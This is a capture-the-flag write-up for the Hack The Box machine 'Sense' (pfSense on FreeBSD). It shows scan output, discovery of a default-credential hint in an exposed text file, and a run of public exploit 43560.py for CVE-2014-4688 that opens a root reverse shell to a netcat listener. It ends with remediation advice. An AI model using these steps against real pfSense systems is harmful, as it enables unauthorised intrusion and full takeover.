Getting System on Sense - 'Sense' HTB Writeup
Getting System on Sense - ‘Sense’ HTB Writeup
Host Information
| Hostname | IP Address | Operating System | Difficulty Level |
| Sense | 10.10.10.60 | FreeBSD | Easy |
Writeup Contents:
(you can jump to the section using these links)
Initial Recon
Again, we start with our initial recon of the target system. We’ll use the same enumeration automation script we used on ‘Sunday’ & ‘Bounty,’ and ‘Cronos’ - nmapAutomator. You can find and download the script here on Github.
Let’s run a full scan against the target:
root@kali:~# nmapautomator 10.10.10.60 all
Running a all scan on 10.10.10.60
Host is likely running Linux
---------------------Starting Nmap Quick Scan---------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-28 22:27 CST
Nmap scan report for 10.10.10.60
Host is up (0.045s latency).
Not shown: 998 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 7.38 seconds
---------------------Starting Nmap Basic Scan---------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-28 22:27 CST
Nmap scan report for 10.10.10.60
Host is up (0.042s latency).
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
443/tcp open ssl/https?
|_ssl-date: TLS randomness does not represent time
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.07 seconds
----------------------Starting Nmap UDP Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-28 22:29 CST
Nmap scan report for 10.10.10.60
Host is up.
All 1000 scanned ports on 10.10.10.60 are open|filtered
Nmap done: 1 IP address (1 host up) scanned in 201.52 seconds
---------------------Starting Nmap Full Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-28 22:32 CST
Initiating Parallel DNS resolution of 1 host. at 22:32
Completed Parallel DNS resolution of 1 host. at 22:32, 0.01s elapsed
Initiating SYN Stealth Scan at 22:32
Scanning 10.10.10.60 [65535 ports]
Discovered open port 80/tcp on 10.10.10.60
Discovered open port 443/tcp on 10.10.10.60
SYN Stealth Scan Timing: About 9.81% done; ETC: 22:38 (0:04:45 remaining)
SYN Stealth Scan Timing: About 22.97% done; ETC: 22:37 (0:03:25 remaining)
SYN Stealth Scan Timing: About 34.39% done; ETC: 22:37 (0:02:54 remaining)
SYN Stealth Scan Timing: About 45.82% done; ETC: 22:37 (0:02:23 remaining)
SYN Stealth Scan Timing: About 57.25% done; ETC: 22:37 (0:01:53 remaining)
SYN Stealth Scan Timing: About 68.67% done; ETC: 22:37 (0:01:23 remaining)
SYN Stealth Scan Timing: About 80.10% done; ETC: 22:37 (0:00:52 remaining)
Completed SYN Stealth Scan at 22:37, 262.68s elapsed (65535 total ports)
Nmap scan report for 10.10.10.60
Host is up (0.044s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 262.86 seconds
Raw packets sent: 131267 (5.776MB) | Rcvd: 201 (8.844KB)
No new ports
---------------------Starting Nmap Vulns Scan---------------------
Running CVE scan on basic ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-28 22:37 CST
Nmap scan report for 10.10.10.60
Host is up (0.042s latency).
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_https-redirect: ERROR: Script execution failed (use -d to debug)
443/tcp open ssl/https?
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.77 seconds
Running Vuln scan on basic ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-28 22:37 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.60
Host is up (0.039s latency).
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-passwd: ERROR: Script execution failed (use -d to debug)
|_http-server-header: lighttpd/1.4.35
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_https-redirect: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:lighttpd:lighttpd:1.4.35:
|_ CVE-2018-19052 5.0 https://vulners.com/cve/CVE-2018-19052
443/tcp open ssl/https?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
| References:
| http://www.cvedetails.com/cve/2014-0224
| http://www.openssl.org/news/secadv_20140605.txt
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
| Modulus Type: Non-safe prime
| Modulus Source: RFC5114/1024-bit DSA group with 160-bit prime order subgroup
| Modulus Length: 1024
| Generator Length: 1024
| Public Key Length: 1024
| References:
|_ https://weakdh.org
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: CVE:CVE-2014-3566 BID:70574
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.securityfocus.com/bid/70574
|_ https://www.openssl.org/~bodo/ssl-poodle.pdf
|_sslv2-drown:
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 194.22 seconds
---------------------Recon Recommendations----------------------
Web Servers Recon:
gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.php -u http://10.10.10.60:80 -o recon/gobuster_10.10.10.60_80.txt
nikto -host 10.10.10.60:80 | tee recon/nikto_10.10.10.60_80.txt
sslscan 10.10.10.60 | tee recon/sslscan_10.10.10.60_443.txt
gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.php -u https://10.10.10.60:443 -o recon/gobuster_10.10.10.60_443.txt
nikto -host https://10.10.10.60:443 -ssl | tee recon/nikto_10.10.10.60_443.txt
Which commands would you like to run?
All (Default), gobuster, nikto, sslscan, Skip <!>
Running Default in (1) s:
---------------------Running Recon Commands----------------------
Starting gobuster scan
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.60:80
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Show length: true
[+] Extensions: html,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/01/28 22:41:12 Starting gobuster
===============================================================
/changelog.txt (Status: 200)
/edit.php (Status: 200)
/exec.php (Status: 200)
/favicon.ico (Status: 200)
/graph.php (Status: 200)
/help.php (Status: 200)
/index.php (Status: 200)
/index.html (Status: 200)
/installer (Status: 200)
/interfaces.php (Status: 200)
/license.php (Status: 200)
/pkg.php (Status: 200)
/stats.php (Status: 200)
/status.php (Status: 200)
/system.php (Status: 200)
/tree (Status: 200)
/wizard.php (Status: 200)
/xmlrpc.php (Status: 200)
/~sys~ (Status: 403)
=========================
Starting nikto scan
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.60
+ Target Hostname: 10.10.10.60
+ Target Port: 443
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=US/ST=Somewhere/L=Somecity/O=CompanyName/OU=Organizational Unit Name (eg, section)/CN=Common Name (eg, YOUR name)/emailAddress=Email Address
Ciphers: AES256-SHA
Issuer: /C=US/ST=Somewhere/L=Somecity/O=CompanyName/OU=Organizational Unit Name (eg, section)/CN=Common Name (eg, YOUR name)/emailAddress=Email Address
+ Start Time: 2020-01-28 22:54:49 (GMT-6)
---------------------------------------------------------------------------
+ Server: lighttpd/1.4.35
+ Cookie cookie_test created without the secure flag
+ Cookie cookie_test created without the httponly flag
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Hostname '10.10.10.60' does not match certificate's names: Common
+ Multiple index files found: /index.php, /index.html
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ 7864 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2020-01-28 23:19:00 (GMT-6) (1451 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Finished nikto scan
=========================
---------------------Finished all Nmap scans---------------------
Completed in 51 minute(s) and 29 second(s)
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-29 12:07 CST
Nmap scan report for 10.10.10.60
Host is up (0.031s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose
Running (JUST GUESSING): Comau embedded (92%), OpenBSD 4.X (86%), FreeBSD 8.X (85%)
OS CPE: cpe:/o:openbsd:openbsd:4.0 cpe:/o:freebsd:freebsd:8.1
Aggressive OS guesses: Comau C4G robot control unit (92%), OpenBSD 4.0 (86%), FreeBSD 8.1 (85%), OpenBSD 4.3 (85%)
No exact OS matches for host (test conditions non-ideal).
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.18 seconds
OK, looks like there might be some potential SSL vulnerabilities such as POODLE we might be able to leverage, but let’s go ahead and check out what’s being served on HTTP and HTTPS:
checking out HTTP and HTTPS
We notice by quickly going to the IP of the box in a browser, that it redirects to the HTTPS/SSL version of the site. We get a self-signed cert warning, but if we continue past that, we’re greeted with a pfSense login page. This confirms that the system is indeed FreeBSD. This also tells me that we probably need to be careful on what kind of automated enumeration and brute-force scripts we run against the system; as pfsense is an open-source firewall software/distro, it’s possible that some blocklist rules are already in place to protect the host if too many repeat attempts are detected in rapid succession. Just something to keep in mind. This also might explain why the nmap automator script took abnormally long when it got to the nikto portion of the scan. I’m not sure of a way to tell for sure, from this vantage point, but figure it’s better “safe than sorry” when it comes to noisy or brute force scripts on a box like this.
A quick google search reveals that the default login creds for pfsense is admin / pfsense - trying that does not seem to work, however. Going to a few of the pages picked up by gobuster also seems to direct to the login page.
We can see a file in the URI https://10.10.10.60/changelog.txt; checking it out seems to show that there were 2 of 3 vulnerabilities in the firewall that were patched:
# Security Changelog
### Issue
There was a failure in updating the firewall. Manual patching is therefore required
### Mitigated
2 of 3 vulnerabilities have been patched.
### Timeline
The remaining patches will be installed during the next maintenance window
It looks like the gobuster run on nmapAutomator doesn’t run with many extensions let’s ,run it with a few extensiosn to see if we find any other files the initial recon script may have overlooked. After trying a few wordlists, we find one that seems to turn up some interesting results:
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,sh,html,pl,txt
[+] Timeout: 10s
===============================================================
2020/01/29 21:12:12 Starting gobuster
===============================================================
/index.php (Status: 200)
/index.html (Status: 200)
/help.php (Status: 200)
/themes (Status: 301)
/stats.php (Status: 200)
/css (Status: 301)
/edit.php (Status: 200)
/includes (Status: 301)
/license.php (Status: 200)
/system.php (Status: 200)
/status.php (Status: 200)
/javascript (Status: 301)
/changelog.txt (Status: 200)
/classes (Status: 301)
/exec.php (Status: 200)
/widgets (Status: 301)
/graph.php (Status: 200)
/tree (Status: 301)
/wizard.php (Status: 200)
/shortcuts (Status: 301)
/pkg.php (Status: 200)
/installer (Status: 301)
/wizards (Status: 301)
/xmlrpc.php (Status: 200)
/reboot.php (Status: 200)
/interfaces.php (Status: 200)
/csrf (Status: 301)
/system-users.txt (Status: 200)
/filebrowser (Status: 301)
/%7echeckout%7e (Status: 403)
/services_dyndns.php (Status: 200)
===============================================================
2020/01/29 22:49:16 Finished
===============================================================
Interesting, so there’s a few things we can check out, but the thing that sticks out to me is the /system-users.txt file. If we look at it, we see the following:
####Support ticket###
Please create the following user
username: Rohit
password: company defaults
Trying rohit / pfsense seems to work, and takes us to the pfsense dashboard.
Exploiting a pfsense vulnerability
From here, let’s do some further enumeration, and perhaps see if we can find out the third unpatched vulnerability the changelog.txt file mentions. We may be able to leverage an exploit of that vulnerability to gain an initial foothold on the box.
We can see from first logging in that the box is running pfsense 2.1.3-RELEASE. If we do a quick searchsploit query for pfsense 2.1 (nothing showed for 2.1.3), we see the following:
root@kali:~# searchsploit pfsense 2.1
------------------------------------------ ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------ ----------------------------------------
pfSense 2.1 build 20130911-1816 - Directo | exploits/php/webapps/31263.txt
pfSense < 2.1.4 - 'status_rrd_graph_img.p | exploits/php/webapps/43560.py
------------------------------------------ ----------------------------------------
Shellcodes: No Result
The second exploit looks like it might be applicable, but it may be one of the three vulnerabilities already patched mentioned in changelog.txt. Let’s check it out. Viewing the exploint gives us a CVE number, CVE-2014-4688, and it looks to be a python 3 exploit. It says:
pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection.
This script will return a reverse shell on specified listener address and port.
Awesome, sounds nice, let’s try it - using searchsploit -m 43560, download the exploit locally, and see the usage information.
root@kali:/writeups/HTB/sense/exploits# searchsploit -m 43560
Exploit: pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection
URL: https://www.exploit-db.com/exploits/43560
Path: /usr/share/exploitdb/exploits/php/webapps/43560.py
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /writeups/HTB/sense/exploits/43560.py
We can see the following usage information from the source code:
parser = argparse.ArgumentParser()
parser.add_argument("--rhost", help = "Remote Host")
parser.add_argument('--lhost', help = 'Local Host listener')
parser.add_argument('--lport', help = 'Local Port listener')
parser.add_argument("--username", help = "pfsense Username")
parser.add_argument("--password", help = "pfsense Password")
args = parser.parse_args()
So let’s start a listener locally with nc -lvnp 4444 and give it a shot:
root@kali:/writeups/HTB/sense/exploits# python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.50 --lport 4444 --username rohit --password pfsense
CSRF token obtained
Running exploit...
Exploit completed
root@kali:/writeups/HTB/sense
And if we look in our netcat session, we got a shell. Furthermore, it seems to be a single shot to root:
root@kali:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.50] from (UNKNOWN) [10.10.10.60] 3313
sh: can't access tty; job control turned off
# id && date
uid=0(root) gid=0(wheel) groups=0(wheel)
Thu Jan 30 10:16:18 EST 2020
From here, we can go ahead and grab our flags:
# find / -name user.txt
/home/rohit/user.txt
# find / -name root.txt
/root/root.txt
So why did this work as a “one-shot” to root? By default, pfsense runs as root. It’s almost certainly configurable to not run as root, but would still need to make a lot of privileged system calls and command executions due to its function.
Conclusion
Recommended Remediations
-
Sensitive information such as login credentials to the pfsense application should not be stored in a plaintext file on the webserver. Furthermore, Rohit’s password should probably be changed away from the default pfsense password.
-
The patch and vulnerabiltiy status of the server/application should not be stored publicly accessible location. This can give attackers/malicious actors a great advantage when compromising a system. This information should be kept internally.
-
The pfsense application should be patched to mitigate CVE-2014-4688. This paritcular exploit made use of a weakness in input santization which allowed for arbitrary command injection and execution from a php file that pfsense processed.
Until next time.
~@initinfosec
Let me know what you think of this article on twitter @initinfosec or leave a comment below!